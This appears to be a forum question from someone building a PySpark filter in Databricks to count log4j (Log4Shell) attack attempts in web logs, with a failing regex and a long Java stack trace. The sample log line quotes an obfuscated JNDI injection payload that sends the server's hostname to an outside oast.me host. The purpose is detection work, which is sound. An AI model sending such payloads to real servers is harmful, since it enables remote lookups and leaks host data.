I'm experimenting to filter some events that contains log4j pattern (${jndi:XXXXXXXX...XXX}
) as explain in this post. I tried to filter my pyspark datafarme sdf
based on this regex inspired from this answer unsuccessfully. Let's say i just want to count those logs contains this type of attack vector. The used regex extract in Regex101 but doesn't work in Databricks within dataframe.
The following is an example:
[24/Mar/2022:10:44:23 +0000] 788.268.113.120 "-" "GET /websso/SAML2/SSO/vsphere.local HTTP/1.1" 403 "-b" 0b 2ms "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" 758.133.55.55 42109 "${jndi:${lower:d}n${lower:s}://${env:hostName}.c8u33s1ij2m0lduqp6v0ce6rzbay86hrk.oast.me}" "${jndi:${lower:d}n${lower:s}://${env:hostName}.c8u33s1ij2m0lduqp6v0ce6rzbay86hrk.oast.me}" - - TLSv1.2 -,-,-
My code is:
sdf = spark.read.format("delta").load(INPUT_PATH).filter(f"date >='{DATE_FROM}' AND date <='{DATE_TO}'")\
.filter(f"response_code =='403'")\
.filter(f"http_method =='GET'")\
.filter(F.col("raw").rlike("([\$]|[\%24]){1,3}(?<suspicious_log4j>([\{]|[\%7B]{1,3}).*[jJnNdDiI]{1,4}.+[lLdDaApPsS]{1,5}.+([\/|\%2F]).+)"))\
.replace(float('nan'), None)
#display(sdf)
sdf.count()
I get following error:
java.util.regex.PatternSyntaxException: named capturing group is missing trailing '>' near index 31
---------------------------------------------------------------------------
Py4JJavaError Traceback (most recent call last)
<command-2117761329875990> in <module>
5 .replace(float('nan'), None)
6 #display(sdf)
----> 7 sdf.count()
/databricks/spark/python/pyspark/sql/dataframe.py in count(self)
686 2
687 """
--> 688 return int(self._jdf.count())
689
690 def collect(self):
/databricks/spark/python/lib/py4j-0.10.9.1-src.zip/py4j/java_gateway.py in __call__(self, *args)
1302
1303 answer = self.gateway_client.send_command(command)
-> 1304 return_value = get_return_value(
1305 answer, self.gateway_client, self.target_id, self.name)
1306
/databricks/spark/python/pyspark/sql/utils.py in deco(*a, **kw)
115 def deco(*a, **kw):
116 try:
--> 117 return f(*a, **kw)
118 except py4j.protocol.Py4JJavaError as e:
119 converted = convert_exception(e.java_exception)
/databricks/spark/python/lib/py4j-0.10.9.1-src.zip/py4j/protocol.py in get_return_value(answer, gateway_client, target_id, name)
324 value = OUTPUT_CONVERTER[type](answer[2:], gateway_client)
325 if answer[1] == REFERENCE_TYPE:
--> 326 raise Py4JJavaError(
327 "An error occurred while calling {0}{1}{2}.\n".
328 format(target_id, ".", name), value)
Py4JJavaError: An error occurred while calling o2028.count.
: java.util.regex.PatternSyntaxException: named capturing group is missing trailing '>' near index 31
([\$]|[\%24]){1,3}(?<suspicious_log4j>([\{]|[\%7B]{1,3}).*[jJnNdDiI]{1,4}.+[lLdDaApPsS]{1,5}.+([\/|\%2F]).+)
^
at java.util.regex.Pattern.error(Pattern.java:1969)
at java.util.regex.Pattern.groupname(Pattern.java:2813)
at java.util.regex.Pattern.group0(Pattern.java:2858)
at java.util.regex.Pattern.sequence(Pattern.java:2065)
at java.util.regex.Pattern.expr(Pattern.java:2010)
at java.util.regex.Pattern.compile(Pattern.java:1702)
at java.util.regex.Pattern.<init>(Pattern.java:1352)
at java.util.regex.Pattern.compile(Pattern.java:1028)
at com.databricks.sql.expressions.codegen.EdgeExpressionCodegen$.doGenCode(EdgeExpressionCodegen.scala:1005)
at com.databricks.sql.expressions.codegen.EdgeExpressionCodegen$.genCode(EdgeExpressionCodegen.scala:145)
at com.databricks.sql.expressions.codegen.EdgeExpressionCodegen$.$anonfun$genCodeWithFallback$1(EdgeExpressionCodegen.scala:264)
at scala.Option.getOrElse(Option.scala:189)
at com.databricks.sql.expressions.codegen.EdgeExpressionCodegen$.genCodeWithFallback(EdgeExpressionCodegen.scala:264)
at org.apache.spark.sql.catalyst.expressions.codegen.CodegenContext.generateExpression(CodeGenerator.scala:1441)
at org.apache.spark.sql.execution.FilterExec.genPredicate$2(basicPhysicalOperators.scala:269)
at org.apache.spark.sql.execution.FilterExec.$anonfun$doConsume$4(basicPhysicalOperators.scala:319)
at scala.collection.TraversableLike.$anonfun$map$1(TraversableLike.scala:286)
at scala.collection.mutable.ResizableArray.foreach(ResizableArray.scala:62)
at scala.collection.mutable.ResizableArray.foreach$(ResizableArray.scala:55)
at scala.collection.mutable.ArrayBuffer.foreach(ArrayBuffer.scala:49)
at scala.collection.TraversableLike.map(TraversableLike.scala:286)
at scala.collection.TraversableLike.map$(TraversableLike.scala:279)
at scala.collection.AbstractTraversable.map(Traversable.scala:108)
at org.apache.spark.sql.execution.FilterExec.doConsume(basicPhysicalOperators.scala:294)
at org.apache.spark.sql.execution.CodegenSupport.consume(WholeStageCodegenExec.scala:197)
at org.apache.spark.sql.execution.CodegenSupport.consume$(WholeStageCodegenExec.scala:152)
at org.apache.spark.sql.execution.ColumnarToRowExec.consume(Columnar.scala:70)
at org.apache.spark.sql.execution.ColumnarToRowExec.doProduce(Columnar.scala:196)
at org.apache.spark.sql.execution.CodegenSupport.$anonfun$produce$1(WholeStageCodegenExec.scala:98)
at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
at org.apache.spark.sql.execution.CodegenSupport.produce(WholeStageCodegenExec.scala:93)
at org.apache.spark.sql.execution.CodegenSupport.produce$(WholeStageCodegenExec.scala:93)
at org.apache.spark.sql.execution.ColumnarToRowExec.produce(Columnar.scala:70)
at org.apache.spark.sql.execution.FilterExec.doProduce(basicPhysicalOperators.scala:255)
at org.apache.spark.sql.execution.CodegenSupport.$anonfun$produce$1(WholeStageCodegenExec.scala:98)
at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
at org.apache.spark.sql.execution.CodegenSupport.produce(WholeStageCodegenExec.scala:93)
at org.apache.spark.sql.execution.CodegenSupport.produce$(WholeStageCodegenExec.scala:93)
at org.apache.spark.sql.execution.FilterExec.produce(basicPhysicalOperators.scala:221)
at org.apache.spark.sql.execution.ProjectExec.doProduce(basicPhysicalOperators.scala:55)
at org.apache.spark.sql.execution.CodegenSupport.$anonfun$produce$1(WholeStageCodegenExec.scala:98)
at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
at org.apache.spark.sql.execution.CodegenSupport.produce(WholeStageCodegenExec.scala:93)
at org.apache.spark.sql.execution.CodegenSupport.produce$(WholeStageCodegenExec.scala:93)
at org.apache.spark.sql.execution.ProjectExec.produce(basicPhysicalOperators.scala:45)
at org.apache.spark.sql.execution.aggregate.AggregateCodegenSupport.doProduceWithoutKeys(AggregateCodegenSupport.scala:361)
at org.apache.spark.sql.execution.aggregate.AggregateCodegenSupport.doProduce(AggregateCodegenSupport.scala:66)
at org.apache.spark.sql.execution.aggregate.AggregateCodegenSupport.doProduce$(AggregateCodegenSupport.scala:64)
at org.apache.spark.sql.execution.aggregate.HashAggregateExec.doProduce(HashAggregateExec.scala:47)
at org.apache.spark.sql.execution.CodegenSupport.$anonfun$produce$1(WholeStageCodegenExec.scala:98)
at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
at org.apache.spark.sql.execution.CodegenSupport.produce(WholeStageCodegenExec.scala:93)
at org.apache.spark.sql.execution.CodegenSupport.produce$(WholeStageCodegenExec.scala:93)
at org.apache.spark.sql.execution.aggregate.HashAggregateExec.produce(HashAggregateExec.scala:47)
at org.apache.spark.sql.execution.WholeStageCodegenExec.doCodeGen(WholeStageCodegenExec.scala:659)
at org.apache.spark.sql.execution.WholeStageCodegenExec.doExecute(WholeStageCodegenExec.scala:722)
at org.apache.spark.sql.execution.SparkPlan.$anonfun$execute$1(SparkPlan.scala:224)
at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
at org.apache.spark.sql.execution.SparkPlan.execute(SparkPlan.scala:220)
at org.apache.spark.sql.execution.exchange.ShuffleExchangeExec.inputRDD$lzycompute(ShuffleExchangeExec.scala:152)
at org.apache.spark.sql.execution.exchange.ShuffleExchangeExec.inputRDD(ShuffleExchangeExec.scala:152)
at org.apache.spark.sql.execution.exchange.ShuffleExchangeExec.mapOutputStatisticsFuture$lzycompute(ShuffleExchangeExec.scala:157)
at org.apache.spark.sql.execution.exchange.ShuffleExchangeExec.mapOutputStatisticsFuture(ShuffleExchangeExec.scala:156)
at org.apache.spark.sql.execution.exchange.ShuffleExchangeLike.$anonfun$submitShuffleJob$1(ShuffleExchangeExec.scala:73)
at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
at org.apache.spark.sql.execution.exchange.ShuffleExchangeLike.submitShuffleJob(ShuffleExchangeExec.scala:73)
at org.apache.spark.sql.execution.exchange.ShuffleExchangeLike.submitShuffleJob$(ShuffleExchangeExec.scala:72)
at org.apache.spark.sql.execution.exchange.ShuffleExchangeExec.submitShuffleJob(ShuffleExchangeExec.scala:132)
at org.apache.spark.sql.execution.adaptive.ShuffleQueryStageExec.shuffleFuture$lzycompute(QueryStageExec.scala:268)
at org.apache.spark.sql.execution.adaptive.ShuffleQueryStageExec.shuffleFuture(QueryStageExec.scala:268)
at org.apache.spark.sql.execution.adaptive.ShuffleQueryStageExec.doMaterialize(QueryStageExec.scala:270)
at org.apache.spark.sql.execution.adaptive.QueryStageExec.materialize(QueryStageExec.scala:123)
at org.apache.spark.sql.execution.adaptive.AdaptiveSparkPlanExec.$anonfun$getFinalPhysicalPlan$5(AdaptiveSparkPlanExec.scala:394)
at org.apache.spark.sql.execution.adaptive.AdaptiveSparkPlanExec.$anonfun$getFinalPhysicalPlan$5$adapted(AdaptiveSparkPlanExec.scala:392)
at scala.collection.Iterator.foreach(Iterator.scala:943)
at scala.collection.Iterator.foreach$(Iterator.scala:943)
at scala.collection.AbstractIterator.foreach(Iterator.scala:1431)
at scala.collection.IterableLike.foreach(IterableLike.scala:74)
at scala.collection.IterableLike.foreach$(IterableLike.scala:73)
at scala.collection.AbstractIterable.foreach(Iterable.scala:56)
at org.apache.spark.sql.execution.adaptive.AdaptiveSparkPlanExec.$anonfun$getFinalPhysicalPlan$1(AdaptiveSparkPlanExec.scala:392)
at org.apache.spark.sql.SparkSession.withActive(SparkSession.scala:958)
at org.apache.spark.sql.execution.adaptive.AdaptiveSparkPlanExec.getFinalPhysicalPlan(AdaptiveSparkPlanExec.scala:364)
at org.apache.spark.sql.execution.adaptive.AdaptiveSparkPlanExec.withFinalPlanUpdate(AdaptiveSparkPlanExec.scala:496)
at org.apache.spark.sql.execution.ResultCacheManager.computeResult(ResultCacheManager.scala:594)
at org.apache.spark.sql.execution.ResultCacheManager.$anonfun$getOrComputeResultInternal$1(ResultCacheManager.scala:542)
at scala.Option.getOrElse(Option.scala:189)
at org.apache.spark.sql.execution.ResultCacheManager.getOrComputeResultInternal(ResultCacheManager.scala:541)
at org.apache.spark.sql.execution.ResultCacheManager.getOrComputeResult(ResultCacheManager.scala:438)
at org.apache.spark.sql.execution.ResultCacheManager.getOrComputeResult(ResultCacheManager.scala:417)
at org.apache.spark.sql.execution.SparkPlan.executeCollectResult(SparkPlan.scala:422)
at org.apache.spark.sql.execution.SparkPlan.executeCollect(SparkPlan.scala:398)
at org.apache.spark.sql.Dataset.$anonfun$count$1(Dataset.scala:3160)
at org.apache.spark.sql.Dataset.$anonfun$count$1$adapted(Dataset.scala:3159)
at org.apache.spark.sql.Dataset.$anonfun$withAction$1(Dataset.scala:3901)
at org.apache.spark.sql.execution.SQLExecution$.$anonfun$withCustomExecutionEnv$5(SQLExecution.scala:196)
at org.apache.spark.sql.execution.SQLExecution$.withSQLConfPropagated(SQLExecution.scala:343)
at org.apache.spark.sql.execution.SQLExecution$.$anonfun$withCustomExecutionEnv$1(SQLExecution.scala:148)
at org.apache.spark.sql.SparkSession.withActive(SparkSession.scala:958)
at org.apache.spark.sql.execution.SQLExecution$.withCustomExecutionEnv(SQLExecution.scala:115)
at org.apache.spark.sql.execution.SQLExecution$.withNewExecutionId(SQLExecution.scala:293)
at org.apache.spark.sql.Dataset.withAction(Dataset.scala:3899)
at org.apache.spark.sql.Dataset.count(Dataset.scala:3159)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at py4j.reflection.MethodInvoker.invoke(MethodInvoker.java:244)
at py4j.reflection.ReflectionEngine.invoke(ReflectionEngine.java:380)
at py4j.Gateway.invoke(Gateway.java:295)
at py4j.commands.AbstractCommand.invokeMethod(AbstractCommand.java:132)
at py4j.commands.CallCommand.execute(CallCommand.java:79)
at py4j.GatewayConnection.run(GatewayConnection.java:251)
at java.lang.Thread.run(Thread.java:748)
I found some workaround like here Hoping to learn from the regex masters or anyone who has input on this :)